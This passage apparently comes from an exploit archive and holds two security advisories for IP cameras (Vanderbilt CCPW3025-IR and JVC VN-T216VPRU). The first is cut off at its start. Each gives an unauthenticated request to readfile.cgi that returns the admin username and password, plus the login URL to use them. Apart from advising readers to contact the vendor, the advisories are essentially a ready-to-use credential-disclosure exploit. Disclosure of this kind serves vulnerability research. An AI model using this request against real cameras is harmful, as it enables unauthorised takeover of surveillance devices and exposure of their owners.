Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.


4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 

-----------------------------------------------

Login @ http://host:port/cgi-bin/chklogin.cgi


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
HireHackking 
1. Advisory Information
========================================
Title                   : JVC IP-Camera (VN-T216VPRU) Remote Credentials Disclosure
Vendor Homepage         : http://pro.jvc.com/
Remotely Exploitable	: Yes
Tested on Camera types	: VN-T216VPRU
Product References      : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145
Vulnerability           : Username / Password Disclosure (Critical/High)
Date                    : 19/08/2016
Author                  : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
  

3. Description
========================================
JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.


4. Proof-of-Concept:
========================================
Simply go to the following url:
http://host:port/cgi-bin/readfile.cgi?query=ADMINID

Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 

-----------------------------------------------

Login @ http://host:port/cgi-bin/chklogin.cgi


5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.